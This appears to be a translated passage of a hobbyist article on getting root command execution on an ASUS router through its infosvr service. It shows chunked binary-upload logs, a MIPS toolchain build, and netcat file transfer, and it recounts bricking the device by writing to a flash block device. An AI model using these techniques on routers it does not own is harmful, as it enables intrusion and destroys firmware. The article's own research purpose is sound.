53.0% 150.9 Bps part 111 (48 B; cmd: 235 ch) LOST
53.0% 31.7 Bps part 111 (48 B; cmd: 235 ch) 192.168.1.1: OK
53.5% 410.3 Bps part 112 (48 B; cmd: 235 ch) 192.168.1.1: OK
54.0% 143.3 Bps part 113 (48 B; cmd: 235 ch) 192.168.1.1: OK
54.4% 144.6 Bps part 114 (48 B; cmd: 235 ch) 192.168.1.1: OK
54.9% 141.6 Bps part 115 (48 B; cmd: 235 ch) 192.168.1.1: OK
55.4% 150.0 Bps part 116 (48 B; cmd: 235 ch) 192.168.1.1: OK
55.9% 140.4 Bps part 117 (48 B; cmd: 235 ch) 192.168.1.1: OK
56.3% 151.9 Bps part 118 (48 B; cmd: 235 ch) 192.168.1.1: OK
56.8% 142.0 Bps part 119 (48 B; cmd: 235 ch) 192.168.1.1: OK
57.3% 145.5 Bps part 120 (48 B; cmd: 235 ch) 192.168.1.1: OK
57.8% 140.8 Bps part 121 (48 B; cmd: 235 ch) 192.168.1.1: OK
58.3% 154.3 Bps part 122 (48 B; cmd: 235 ch) 192.168.1.1: OK
58.7% 144.6 Bps part 123 (48 B; cmd: 235 ch) 192.168.1.1: OK
59.2% 141.2 Bps part 124 (48 B; cmd: 235 ch) 192.168.1.1: OK
59.7% 138.7 Bps part 125 (48 B; cmd: 235 ch) 192.168.1.1: OK
60.2% 151.9 Bps part 126 (48 B; cmd: 235 ch) 192.168.1.1: OK
60.6% 142.9 Bps part 127 (48 B; cmd: 235 ch) LOST
60.6% 31.9 Bps part 127 (48 B; cmd: 235 ch) 192.168.1.1: OK
61.1% 378.0 Bps part 128 (48 B; cmd: 235 ch) 192.168.1.1: OK
61.6% 142.4 Bps part 129 (48 B; cmd: 235 ch) 192.168.1.1: OK
62.1% 150.0 Bps part 130 (48 B; cmd: 235 ch) 192.168.1.1: OK
62.5% 136.8 Bps part 131 (48 B; cmd: 235 ch) 192.168.1.1: OK
63.0% 154.3 Bps part 132 (48 B; cmd: 235 ch) 192.168.1.1: OK
63.5% 149.1 Bps part 133 (48 B; cmd: 235 ch) 192.168.1.1: OK
64.0% 145.9 Bps part 134 (48 B; cmd: 235 ch) 192.168.1.1: OK
64.4% 142.4 Bps part 135 (48 B; cmd: 235 ch) 192.168.1.1: OK
64.9% 147.7 Bps part 136 (48 B; cmd: 235 ch) 192.168.1.1: OK
65.4% 146.8 Bps part 137 (48 B; cmd: 235 ch) 192.168.1.1: OK
65.9% 142.0 Bps part 138 (48 B; cmd: 235 ch) 192.168.1.1: OK
66.3% 179.8 Bps part 139 (48 B; cmd: 235 ch) 192.168.1.1: OK
66.8% 121.2 Bps part 140 (48 B; cmd: 235 ch) 192.168.1.1: OK
67.3% 182.5 Bps part 141 (48 B; cmd: 235 ch) 192.168.1.1: OK
67.8% 119.4 Bps part 142 (48 B; cmd: 235 ch) 192.168.1.1: OK
68.2% 146.3 Bps part 143 (48 B; cmd: 235 ch) 192.168.1.1: OK
68.7% 145.0 Bps part 144 (48 B; cmd: 235 ch) 192.168.1.1: OK
69.2% 142.4 Bps part 145 (48 B; cmd: 235 ch) 192.168.1.1: OK
69.7% 142.9 Bps part 146 (48 B; cmd: 235 ch) 192.168.1.1: OK
70.2% 145.0 Bps part 147 (48 B; cmd: 235 ch) 192.168.1.1: OK
70.6% 142.0 Bps part 148 (48 B; cmd: 235 ch) 192.168.1.1: OK
71.1% 152.9 Bps part 149 (48 B; cmd: 235 ch) 192.168.1.1: OK
71.6% 177.1 Bps part 150 (48 B; cmd: 235 ch) 192.168.1.1: OK
72.1% 122.8 Bps part 151 (48 B; cmd: 235 ch) 192.168.1.1: OK
72.5% 143.3 Bps part 152 (48 B; cmd: 235 ch) 192.168.1.1: OK
73.0% 145.9 Bps part 153 (48 B; cmd: 235 ch) LOST
73.0% 31.7 Bps part 153 (48 B; cmd: 235 ch) 192.168.1.1: OK
73.5% 432.4 Bps part 154 (48 B; cmd: 235 ch) 192.168.1.1: OK
74.0% 144.6 Bps part 155 (48 B; cmd: 235 ch) 192.168.1.1: OK
74.4% 145.5 Bps part 156 (48 B; cmd: 235 ch) 192.168.1.1: OK
74.9% 182.5 Bps part 157 (48 B; cmd: 235 ch) 192.168.1.1: OK
75.4% 117.1 Bps part 158 (48 B; cmd: 235 ch) 192.168.1.1: OK
75.9% 148.6 Bps part 159 (48 B; cmd: 235 ch) 192.168.1.1: OK
76.3% 183.9 Bps part 160 (48 B; cmd: 235 ch) 192.168.1.1: OK
76.8% 140.4 Bps part 161 (48 B; cmd: 235 ch) 192.168.1.1: OK
77.3% 121.2 Bps part 162 (48 B; cmd: 235 ch) 192.168.1.1: OK
77.8% 149.1 Bps part 163 (48 B; cmd: 235 ch) 192.168.1.1: OK
78.2% 141.6 Bps part 164 (48 B; cmd: 235 ch) 192.168.1.1: OK
78.7% 145.0 Bps part 165 (48 B; cmd: 235 ch) 192.168.1.1: OK
79.2% 148.1 Bps part 166 (48 B; cmd: 235 ch) 192.168.1.1: OK
79.7% 176.5 Bps part 167 (48 B; cmd: 235 ch) 192.168.1.1: OK
80.1% 121.5 Bps part 168 (48 B; cmd: 235 ch) 192.168.1.1: OK
80.6% 145.5 Bps part 169 (48 B; cmd: 235 ch) 192.168.1.1: OK
81.1% 144.6 Bps part 170 (48 B; cmd: 235 ch) LOST
81.1% 31.7 Bps part 170 (48 B; cmd: 235 ch) 192.168.1.1: OK
81.6% 417.4 Bps part 171 (48 B; cmd: 235 ch) 192.168.1.1: OK
82.1% 144.6 Bps part 172 (48 B; cmd: 235 ch) 192.168.1.1: OK
82.5% 182.5 Bps part 173 (48 B; cmd: 235 ch) 192.168.1.1: OK
83.0% 119.4 Bps part 174 (48 B; cmd: 235 ch) 192.168.1.1: OK
83.5% 139.5 Bps part 175 (48 B; cmd: 235 ch) 192.168.1.1: OK
84.0% 145.9 Bps part 176 (48 B; cmd: 235 ch) 192.168.1.1: OK
84.4% 145.9 Bps part 177 (48 B; cmd: 235 ch) 192.168.1.1: OK
84.9% 142.0 Bps part 178 (48 B; cmd: 235 ch) 192.168.1.1: OK
85.4% 150.5 Bps part 179 (48 B; cmd: 235 ch) 192.168.1.1: OK
85.9% 150.0 Bps part 180 (48 B; cmd: 235 ch) 192.168.1.1: OK
86.3% 142.0 Bps part 181 (48 B; cmd: 235 ch) 192.168.1.1: OK
86.8% 143.7 Bps part 182 (48 B; cmd: 235 ch) 192.168.1.1: OK
87.3% 147.7 Bps part 183 (48 B; cmd: 235 ch) 192.168.1.1: OK
87.8% 141.6 Bps part 184 (48 B; cmd: 235 ch) LOST
87.8% 32.0 Bps part 184 (48 B; cmd: 235 ch) 192.168.1.1: OK
88.2% 355.6 Bps part 185 (48 B; cmd: 235 ch) 192.168.1.1: OK
88.7% 149.1 Bps part 186 (48 B; cmd: 235 ch) 192.168.1.1: OK
89.2% 140.4 Bps part 187 (48 B; cmd: 235 ch) 192.168.1.1: OK
89.7% 147.2 Bps part 188 (48 B; cmd: 235 ch) 192.168.1.1: OK
90.1% 148.1 Bps part 189 (48 B; cmd: 235 ch) 192.168.1.1: OK
90.6% 144.1 Bps part 190 (48 B; cmd: 235 ch) LOST
90.6% 32.0 Bps part 190 (48 B; cmd: 235 ch) 192.168.1.1: OK
91.1% 406.8 Bps part 191 (48 B; cmd: 235 ch) 192.168.1.1: OK
91.6% 142.9 Bps part 192 (48 B; cmd: 235 ch) 192.168.1.1: OK
92.0% 148.1 Bps part 193 (48 B; cmd: 235 ch) 192.168.1.1: OK
92.5% 144.6 Bps part 194 (48 B; cmd: 235 ch) 192.168.1.1: OK
93.0% 147.2 Bps part 195 (48 B; cmd: 235 ch) 192.168.1.1: OK
93.5% 144.1 Bps part 196 (48 B; cmd: 235 ch) 192.168.1.1: OK
94.0% 147.7 Bps part 197 (48 B; cmd: 235 ch) 192.168.1.1: OK
94.4% 145.9 Bps part 198 (48 B; cmd: 235 ch) 192.168.1.1: OK
94.9% 174.5 Bps part 199 (48 B; cmd: 235 ch) 192.168.1.1: OK
95.4% 123.4 Bps part 200 (48 B; cmd: 237 ch) 192.168.1.1: OK
Merging to /var/ldd parts 101..116 (16 pcs; cmd: 229 ch) ... OK (5586 B)
Merging to /var/ldd parts 117..132 (16 pcs; cmd: 238 ch) ... OK (6354 B)
Merging to /var/ldd parts 133..148 (16 pcs; cmd: 238 ch) ... OK (7122 B)
Merging to /var/ldd parts 149..164 (16 pcs; cmd: 238 ch) ... OK (7890 B)
Merging to /var/ldd parts 165..180 (16 pcs; cmd: 238 ch) ... OK (8658 B)
Merging to /var/ldd parts 181..196 (16 pcs; cmd: 238 ch) ... OK (9426 B)
Merging to /var/ldd parts 197..200 (4 pcs; cmd: 71 ch) ... OK (9618 B)
Written 9.39KB / 9.85KB 92.9 Bps (avg) Remaining: 00:05 (01:54/01:59)

95.9% 4.9 Bps part 201 (49 B; cmd: 237 ch) 192.168.1.1: OK
96.4% 146.7 Bps part 202 (49 B; cmd: 237 ch) 192.168.1.1: OK
96.8% 155.6 Bps part 203 (49 B; cmd: 237 ch) 192.168.1.1: OK
97.3% 142.9 Bps part 204 (49 B; cmd: 237 ch) 192.168.1.1: OK
97.8% 153.1 Bps part 205 (49 B; cmd: 237 ch) LOST
97.8% 32.7 Bps part 205 (49 B; cmd: 237 ch) 192.168.1.1: OK
98.3% 388.9 Bps part 206 (49 B; cmd: 237 ch) 192.168.1.1: OK
98.8% 148.5 Bps part 207 (49 B; cmd: 237 ch) 192.168.1.1: OK
99.3% 144.5 Bps part 208 (49 B; cmd: 237 ch) 192.168.1.1: OK
99.8% 151.2 Bps part 209 (49 B; cmd: 237 ch) 192.168.1.1: OK
100.0% 75.3 Bps part 210 (25 B; cmd: 143 ch) 192.168.1.1: OK
Merging to /var/ldd parts 201..210 (10 pcs; cmd: 145 ch) ... OK (10084 B)
Written 9.85KB / 9.85KB 78.7 Bps (avg) Remaining: 00:00 (02:00/02:00)

Finished. File size on target is 9.85KB. Working time: 02:00 (120 sec)

Note on the next spoiler
  • Where you see ///*** comments like this ***///, lines were removed so as not to bloat the text.
  • Where you see ///--- this ---///, nothing was removed; these are just explanations.

/dev/console (/dev/ttyS0) - note the name of the file that output is redirected to at the different stages
system cmd: 237 echo -ne "\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x08\x50\x00\x00\x00\x34\x00\x00\x23\x54\x00\x00\x10\x07\x00\x34\x00\x20\x00\x08\x00\x28\x00">/var/ldd_0-1;cat /var/ldd_0-1
rund: echo -ne "\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x08\x50\x00\x00\x00\x34\x00\x00\x23\x54\x00\x00\x10\x07\x00\x34\x00\x20\x00\x08\x00\x28\x00">/var/ldd_0-1;cat /var/ldd_0-1 > /tmp/syscmd.out
49 ELF
system cmd: 237 echo -ne "\x1a\x00\x19\x00\x00\x00\x06\x00\x00\x00\x34\x00\x40\x00\x34\x00\x40\x00\x34\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x01\x34\x00\x40\x01\x34\x00\x40">/var/ldd_0-2;cat /var/ldd_0-2
rund: echo -ne "\x1a\x00\x19\x00\x00\x00\x06\x00\x00\x00\x34\x00\x40\x00\x34\x00\x40\x00\x34\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x01\x34\x00\x40\x01\x34\x00\x40">/var/ldd_0-2;cat /var/ldd_0-2 > /tmp/syscmd.out
49

///*** many, many similar lines — TRANSFER OF THE FILE PARTS ***///

system cmd: 237 echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x24\x44\x00\x01\x8f\xbc\x00\x18\x00\x40\x20\x21\x8f\x99\x80\xac\x02\x20\x28\x21\x03\x20\xf8\x09\xae\x02\x00\x00\x8f\xbc\x00\x18\x8e\x04\x00\x00\x8f\x99\x80\x68\x00">/var/ldd_0-100;cat /var/ldd_0-100
rund: echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x24\x44\x00\x01\x8f\xbc\x00\x18\x00\x40\x20\x21\x8f\x99\x80\xac\x02\x20\x28\x21\x03\x20\xf8\x09\xae\x02\x00\x00\x8f\xbc\x00\x18\x8e\x04\x00\x00\x8f\x99\x80\x68\x00">/var/ldd_0-100;cat /var/ldd_0-100 > /tmp/syscmd.out
48
///--- Request the size of the target file (to check that merging the parts succeeded) ---///
system cmd: 35 echo -n "">>/var/ldd;wc -c rund: echo -n "">>/var/ldd;wc -c /tmp/syscmd.out
2 0

///--- Merging the uploaded parts ---///
system cmd: 228 cat /var/ldd_0-1 /var/ldd_0-2 /var/ldd_0-3 /var/ldd_0-4 /var/ldd_0-5 /var/ldd_0-6 /var/ldd_0-7 /var/ldd_0-8 /var/ldd_0-9 /var/ldd_0-10 /var/ldd_0-11 /var/ldd_0-12 /var/ldd_0-13 /var/ldd_0-14 /var/ldd_0-15 /var/ldd_0-16>/var/ldd;
rund: cat /var/ldd_0-1 /var/ldd_0-2 /var/ldd_0-3 /var/ldd_0-4 /var/ldd_0-5 /var/ldd_0-6 /var/ldd_0-7 /var/ldd_0-8 /var/ldd_0-9 /var/ldd_0-10 /var/ldd_0-11 /var/ldd_0-12 /var/ldd_0-13 /var/ldd_0-14 /var/ldd_0-15 /var/ldd_0-16>/var/ldd; > /tmp/syscmd.out
0 0

///--- Request the size of the target file (to check that merging the parts succeeded) ---///
system cmd: 14 wc -c rund: wc -c /tmp/syscmd.out
4 777
ш $D
system cmd: 238 cat /var/ldd_0-17 /var/ldd_0-18 /var/ldd_0-19 /var/ldd_0-20 /var/ldd_0-21 /var/ldd_0-22 /var/ldd_0-23 /var/ldd_0-24 /var/ldd_0-25 /var/ldd_0-26 /var/ldd_0-27 /var/ldd_0-28 /var/ldd_0-29 /var/ldd_0-30 /var/ldd_0-31 /var/ldd_0-32>>/var/ldd;
rund: cat /var/ldd_0-17 /var/ldd_0-18 /var/ldd_0-19 /var/ldd_0-20 /var/ldd_0-21 /var/ldd_0-22 /var/ldd_0-23 /var/ldd_0-24 /var/ldd_0-25 /var/ldd_0-26 /var/ldd_0-27 /var/ldd_0-28 /var/ldd_0-29 /var/ldd_0-30 /var/ldd_0-31 /var/ldd_0-32>>/var/ldd; > /tmp/syscmd.out
0 777
ш $D
system cmd: 14 wc -c rund: wc -c /tmp/syscmd.out
5 1545
ш $D

///*** many similar lines — MERGING THE TRANSFERRED FILE PARTS ***///

system cmd: 71 cat /var/ldd_0-97 /var/ldd_0-98 /var/ldd_0-99 /var/ldd_0-100>>/var/ldd;
rund: cat /var/ldd_0-97 /var/ldd_0-98 /var/ldd_0-99 /var/ldd_0-100>>/var/ldd; > /tmp/syscmd.out
0 4617
ш $D
system cmd: 14 wc -c rund: wc -c /tmp/syscmd.out
5 4809
ш $D
system cmd: 14 wc -c rund: wc -c /tmp/syscmd.out
5 4809
ш $D

///--- the next command deletes the parts that have already been merged ---///
system cmd: 37 rm /var/ldd_0-*;ls /var/ldd_0-*|wc -l
ls: /var/ldd_0-*: No such file or directory
rund: rm /var/ldd_0-*;ls /var/ldd_0-*|wc -l > /tmp/syscmd.out
2 0
09
ш $D

///--- then the cycle repeats for the next piece (called a chunk in the sources) of the original file ---///

system cmd: 237 echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x18\x3c\x03\x00\x41\xae\x02\x00\x08\x24\x02\x00\x01\xae\x02\x00\x04\xae\x00\x00\x0c\xac\x62\x21\x88\x12\x00\x00\x42\x00\x00\x00\x00\x8f\xa4">/var/ldd_1-1;cat /var/ldd_1-1
rund: echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x18\x3c\x03\x00\x41\xae\x02\x00\x08\x24\x02\x00\x01\xae\x02\x00\x04\xae\x00\x00\x0c\xac\x62\x21\x88\x12\x00\x00\x42\x00\x00\x00\x00\x8f\xa4">/var/ldd_1-1;cat /var/ldd_1-1 > /tmp/syscmd.out
49
system cmd: 237 echo -ne "\x01\x58\x00\x00\x00\x00\x94\x82\x00\x10\x00\x00\x00\x00\x24\x42\xff\xfe\x30\x42\xff\xff\x2c\x42\x00\x02\x10\x40\x00\x39\x24\x03\xff\x00\x8c\x82\x00\x04\x00\x00\x00\x00\x00\x62\x18\x24\x3c\x02\x01">/var/ldd_1-2;cat /var/ldd_1-2
rund: echo -ne "\x01\x58\x00\x00\x00\x00\x94\x82\x00\x10\x00\x00\x00\x00\x24\x42\xff\xfe\x30\x42\xff\xff\x2c\x42\x00\x02\x10\x40\x00\x39\x24\x03\xff\x00\x8c\x82\x00\x04\x00\x00\x00\x00\x00\x62\x18\x24\x3c\x02\x01">/var/ldd_1-2;cat /var/ldd_1-2 > /tmp/syscmd.out
49 X

///*** many, many, many lines — SEVERAL CYCLES GO BY ***///

system cmd: 237 echo -ne "\x00\x01\x00\x00\x00\x00\x00\x41\x21\xa0\x00\x00\x22\x84\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00">/var/ldd_2-9;cat /var/ldd_2-9
rund: echo -ne "\x00\x01\x00\x00\x00\x00\x00\x41\x21\xa0\x00\x00\x22\x84\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00">/var/ldd_2-9;cat /var/ldd_2-9 > /tmp/syscmd.out
49
system cmd: 143 echo -ne "\x00\x00\x00\x22\x84\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00">/var/ldd_2-10;cat /var/ldd_2-10
rund: echo -ne "\x00\x00\x00\x22\x84\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00">/var/ldd_2-10;cat /var/ldd_2-10 > /tmp/syscmd.out
25
system cmd: 35 echo -n "">>/var/ldd;wc -c rund: echo -n "">>/var/ldd;wc -c /tmp/syscmd.out
5 9618

system cmd: 145 cat /var/ldd_2-1 /var/ldd_2-2 /var/ldd_2-3 /var/ldd_2-4 /var/ldd_2-5 /var/ldd_2-6 /var/ldd_2-7 /var/ldd_2-8 /var/ldd_2-9 /var/ldd_2-10>>/var/ldd;
rund: cat /var/ldd_2-1 /var/ldd_2-2 /var/ldd_2-3 /var/ldd_2-4 /var/ldd_2-5 /var/ldd_2-6 /var/ldd_2-7 /var/ldd_2-8 /var/ldd_2-9 /var/ldd_2-10>>/var/ldd; > /tmp/syscmd.out
0 9618

system cmd: 14 wc -c rund: wc -c /tmp/syscmd.out
6 10084

system cmd: 37 rm /var/ldd_2-*;ls /var/ldd_2-*|wc -l
ls: /var/ldd_2-*: No such file or directory
rund: rm /var/ldd_2-*;ls /var/ldd_2-*|wc -l > /tmp/syscmd.out
2 0
084

system cmd: 35 echo -n "">>/var/ldd;wc -c rund: echo -n "">>/var/ldd;wc -c /tmp/syscmd.out
6 10084


So what's next?

As you know, on Linux a file must have the execute permission set before it can be run. The problem is that there was no chmod on the router (remember the heavily stripped-down busybox?). But never mind, this can be worked around:



Profit! We have just uploaded our executable to the router and it runs! Hey, wait... where did we get this file from?

How to get executable files for your router


First of all, you need to find out the CPU architecture of your router. The easy way does not give all the information you need:
# cat /proc/cpuinfo
system type: RTL8196C
processor: 0
cpu model: 52481
BogoMIPS: 389.12
tlb_entries: 32
mips16 implemented: yes
#

You can, of course, look this up in the datasheet... but what if it is not available? And what if there are different hardware revisions? The surest way is to look at what is already running on the device.

You will have to somehow get an executable off the router in order to analyze it with the file and readelf -h commands.

I did it like this:
  • launched telnetd and connected TeraTerm to it
  • configured TeraTerm to log to a file with the binary option
  • did not touch TeraTerm any more (so that nothing extra gets into the start of the log)
  • executed AsusCmd.exe "cat /bin/infosvr > /dev/ttyp0;"
  • stopped logging to the file

The resulting file came out slightly larger than the one on the router (some garbage got mixed in). But never mind: we are only interested in the beginning of the file, the ELF header.

Transfer the resulting file to a Linux machine. Now you can look at the header:



Now everything is clear: MIPS-1, Big endian.
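To draw the same conclusion from a raw capture without readelf, here is an added example (my code, not part of the article or of AsusRouterTools): it scans past the junk that a TeraTerm log mixes in, decodes the ELF32 header fields and derives the MIPS ISA level and ABI from e_flags, and a compatible() check on those fields explains the "Bus error" and "Illegal instruction" cases discussed below. The 52 header bytes are those of the ldd binary transferred in the log above; the junk around them is a constructed sample.

```python
import struct

# Reference input: the ELF32 header of the ldd binary from the transfer log above
# (49 bytes of part 0-1 followed by the first 3 bytes of part 0-2).
LDD_HEADER = (
    b"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x08\x50\x00\x00\x00\x34"
    b"\x00\x00\x23\x54\x00\x00\x10\x07\x00\x34\x00\x20\x00\x08\x00\x28"
    b"\x00\x1a\x00\x19"
)
# Constructed sample of a terminal capture: echo of the command, then junk bytes.
JUNK_BEFORE = b"\r\n# cat /bin/infosvr > /dev/ttyp0;\r\n"
CAPTURED_LOG = JUNK_BEFORE + LDD_HEADER + b"\x00" * 8 + b"\r\n# "

EM_MIPS = 8
# EF_MIPS_ARCH lives in the top nibble of e_flags, EF_MIPS_ABI in bits 12..15.
MIPS_ARCH = {0x0: "MIPS-1", 0x1: "MIPS-2", 0x2: "MIPS-3", 0x3: "MIPS-4", 0x4: "MIPS-5",
             0x5: "MIPS-32", 0x6: "MIPS-64", 0x7: "MIPS-32r2", 0x8: "MIPS-64r2"}
MIPS_ABI = {0x0: "none", 0x1: "o32", 0x2: "o64", 0x3: "eabi32", 0x4: "eabi64"}

def find_elf(blob):
    """Offset of the first ELF magic in a raw capture, or -1 if there is none."""
    return blob.find(b"\x7fELF")

def parse_elf32_header(blob):
    """Decode the fields readelf -h prints for a 32-bit ELF, skipping leading junk."""
    off = find_elf(blob)
    if off < 0 or len(blob) - off < 52:
        raise ValueError("no complete ELF32 header in capture")
    ident = blob[off:off + 16]
    if ident[4] != 1:                      # EI_CLASS: 1 = ELFCLASS32
        raise ValueError("only ELF32 is handled here")
    endian = {1: "<", 2: ">"}[ident[5]]    # EI_DATA: 1 = LSB, 2 = MSB
    (e_type, e_machine, _ver, e_entry, _phoff, _shoff, e_flags, _ehsize,
     _phentsize, e_phnum, _shentsize, e_shnum, _shstrndx) = struct.unpack(
        endian + "HHIIIIIHHHHHH", blob[off + 16:off + 52])
    hdr = {"endian": "big" if endian == ">" else "little", "type": e_type,
           "machine": e_machine, "entry": e_entry, "flags": e_flags,
           "phnum": e_phnum, "shnum": e_shnum}
    if e_machine == EM_MIPS:
        hdr["isa"] = MIPS_ARCH.get(e_flags >> 28, "unknown")
        hdr["abi"] = MIPS_ABI.get((e_flags >> 12) & 0xF, "unknown")
    return hdr

def describe(hdr):
    """One-line summary in the spirit of readelf -h."""
    s = f"ELF32 {hdr['endian']}-endian machine {hdr['machine']}"
    if "isa" in hdr:
        s = f"ELF32 {hdr['endian']}-endian MIPS ({hdr['isa']}, {hdr['abi']})"
    return s + f", entry 0x{hdr['entry']:x}"

def compatible(reference, candidate):
    """List why a candidate binary would not run where the reference one does."""
    return [f"{k}: {candidate.get(k)} != {reference.get(k)}"
            for k in ("endian", "machine", "isa", "abi")
            if reference.get(k) != candidate.get(k)]

if __name__ == "__main__":
    print(describe(parse_elf32_header(CAPTURED_LOG)))
```

Run a buildroot-produced binary through compatible() against the router's own header before uploading it: a wrong ISA nibble or endianness is exactly what shows up later as "Bus error" or "Illegal instruction".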

Building a toolchain for our router

Here is my script memo (choose a configurator to your taste):
#!/bin/sh
wget http://buildroot.uclibc.org/downloads/buildroot-2014.11.tar.gz
tar zxf buildroot-2014.11.tar.gz
cd buildroot-2014.11
sudo apt-get -y install g++
# curses-based configurators
sudo apt-get -y install libncurses5-dev
make menuconfig # original curses-based configurator
#make nconfig # new curses-based configurator
# Qt-based configurator
#sudo apt-get -y install libqt4-dev
#make xconfig # Qt-based configurator
# GTK-based configurator
#sudo apt-get -y install libgtk2.0-dev libglade2-dev
#make gconfig # GTK-based configurator
make

At the make *config step, we configure the toolchain.

At a minimum, you need to set the target architecture: Target options ---> Target Architecture and Target Architecture Variant. There is a small catch: you will not find MIPS I in Target Architecture Variant right away. To make it appear, you need to enable the Build options ---> Show options and packages that are deprecated or obsolete option.

You can leave everything else alone. Or you can configure a lot: enable support for C++ and other languages, static linking (I got nothing good out of it), choose applications to compile for the target architecture, busybox applets, library versions, etc.

After configuring, select Exit, agree to save the new configuration and... make. The build takes a long time, depending on what you selected (with only the target processor architecture configured, the build in VMware took a little over half an hour. I measured it like this: ttt=`date`; make; echo $ttt; date). You can build in parallel, but not with -jN. The manual reads:
You should never use make -jN with Buildroot: top-level parallel make is currently not supported. Instead, use the BR2_JLEVEL option to tell Buildroot to run the compilation of each individual package with make -jN .
I.e. you need to set the Build options ---> Number of jobs to run simultaneously parameter.

Toolchain ready

Finally, after xx minutes, the toolchain built completely and without errors. It can be used. GCC for the router is at ./buildroot-2014.11/output/host/usr/bin/mips-linux-gcc (a symlink to mips-buildroot-linux-uclibc-gcc).
To begin, we'll write a primitive program, compile it, upload it to the router, set the execute permission (the trick shown earlier) and run it:



Now you can write your own programs for the router, taking into account its limited resources and the capabilities of the libraries present on it.

But along with the toolchain, some binaries for the target platform got built too! They are in ./buildroot-2014.11/output/target/{bin,sbin,usr/bin,usr/sbin}. I tried many of them (in menuconfig I had enabled the build of many additional applications). Those that turned out to work and seemed useful I kept separately (they might come in handy some day).

Not all of them worked. After uploading to the router, many refused to run for various reasons:
  • most often - can't load library 'some library'
  • partially working - can't resolve symbol 'some symbol'
  • Segmentation fault - no comment
  • and all the statically linked ones - Illegal instruction

And if you get an error like Bus error or unexpected word, then most likely you chose the wrong target architecture (or the file is corrupted).

Increase comfort

You probably noticed that the file transfer speed through the "hole" in infosvr leaves much to be desired, to put it mildly. I wanted to solve this problem by writing a TargetSideAgent that would be small and bring up a full TCP connection. I had already written a bit of code when SUDDENLY I discovered the wonderful netcat utility! It turned out to be among the working applications built by buildroot for the target platform. Now you don't have to wait for ages: netcat transfers files to the router (and from the router too) almost instantly! For fast transfer, you can now use this approach:
  • upload netcat to the router using AsusBinWrite
  • set the execute permission on it
  • start it on the receiving side:
    ./netcat -vvlp 8888 > recvfile
  • and start the transfer from the computer:
    ncat.exe -vv --send-only 192.168.1.1 8888 < Useful\cpuload

By the way, if for some reason a file transfer with AsusBinWrite was interrupted, you can resume it using the RESUME option:

Resuming an interrupted transfer



Now the speed is decent and you can easily upload even "weighty" files. But don't get carried away. Do not forget that /var and /tmp (which is actually /var/tmp) live in the router's RAM. If you exhaust it completely, the router will stop responding (or freeze altogether), and you will have to restart it manually. Monitor free memory with free.

By the way, when I was looking for netcat for Windows, I came across "21st century netcat". It is much richer in functionality than regular netcat. For our case, the --send-only option turned out to be very useful (it closes the connection immediately after the transfer).

What else can be done?


Take a look at this 'setup':
# mount
rootfs on / type rootfs (rw)
/dev/root on / type squashfs (ro,relatime)
proc on /proc type proc (rw,relatime)
ramfs on /var type ramfs (rw,relatime)
#
# cat /proc/partitions
major minor #blocks name

31 0 64 mtdblock0
31 1 3211 mtdblock1
31 2 4032 mtdblock2
#
# cat /proc/mtd
dev: size erasesize name
mtd0: 00010000 00001000 "boot+cfg"
mtd1: 00322fee 00001000 "root fs"
mtd2: 003f0000 00001000 "linux+root fs"
#
# ls -lF /dev
crw-rw-rw- 1 root root 4, 64 Sep 18 20:22 console
lrwxrwxrwx 1 root root 8 Sep 18 12:05 log -> /tmp/log=
drwxrwxrwx 2 root root 3 Sep 18 12:03 misc/
brw-rw-rw- 1 root root 31, 0 Sep 18 12:05 mtdblock0
brw-rw-rw- 1 root root 31, 1 Sep 18 12:05 mtdblock1
brw-rw-rw- 1 root root 31, 2 Sep 18 12:05 mtdblock2
brw-rw-rw- 1 root root 31, 3 Sep 18 12:05 mtdblock3
crw-rw-rw- 1 root root 1, 3 Sep 18 12:05 null
crw-rw-rw- 1 root root 108, 0 Sep 18 12:05 ppp
crw-rw-rw- 1 root 5 5, 2 Sep 18 12:05 ptmx
drwxrwxrwx 2 root root 3 Sep 18 12:03 pts/
crw-rw-rw- 1 root root 2, 0 Sep 18 20:23 ptyp0
crw-rw-rw- 1 root root 2, 1 Sep 18 12:05 ptyp1
crw-rw-rw- 1 root root 4, 64 Sep 18 12:05 ttyS0
crw-rw-rw- 1 root root 4, 65 Sep 18 12:05 ttyS1
crw-rw-rw- 1 root root 3, 0 Sep 18 20:23 ttyp0
crw-rw-rw- 1 root root 3, 1 Sep 18 12:05 ttyp1
crw-rw-rw- 1 root root 1, 9 Sep 18 12:05 urandom
#


I somehow inadvertently redirected something to /dev/mtdblock2. It got written. The router kept working. Then, when I decided to reboot it, it did not boot. After looking at what came out on the UART, I realized that I had indeed damaged the firmware. The router booted into recovery mode (the Asus Firmware Restoration utility works with this mode).

Recovery mode
========== SPI =============
SDRAM CLOCK:156MHZ
— Force into Single IO Mode —
|No chipID Sft chipSize blkSize secSize pageSize sdCk opCk chipName |
| 0 ef4016h 0h 400000h 10000h 1000h 100h 104 39 W25Q32|


---RealTek(RTL8196C)at 2012.04.09-16:54+0800 version v1.1f [16bit](390MHz)
no sys signature at 00010000!
